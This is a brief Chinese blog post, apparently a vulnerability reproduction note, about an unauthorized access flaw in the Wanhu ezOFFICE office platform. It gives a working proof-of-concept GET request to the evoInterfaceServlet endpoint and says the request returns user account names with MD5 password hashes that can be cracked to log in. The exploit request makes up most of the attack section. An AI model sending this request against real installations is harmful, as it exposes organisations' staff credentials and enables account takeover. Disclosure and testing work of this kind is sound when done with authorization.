万户协同办公平台 ezoffice简介
万户ezOFFICE集团版协同平台以工作流程、知识管理、沟通交流和辅助办公四大核心应用
漏洞描述
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户ezoffice协同管理平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。
漏洞poc
GET /defaultroot/evoInterfaceServlet?paramType=user HTTP/1.1
Host:
MD5解密可直接登录应用系统,由于数据敏感,不解密。从互联网上借一张登录成功的图
标签:万户,协同,ezoffice,平台,漏洞,办公,复现 From: https://www.cnblogs.com/fuchangjiang/p/17679065.html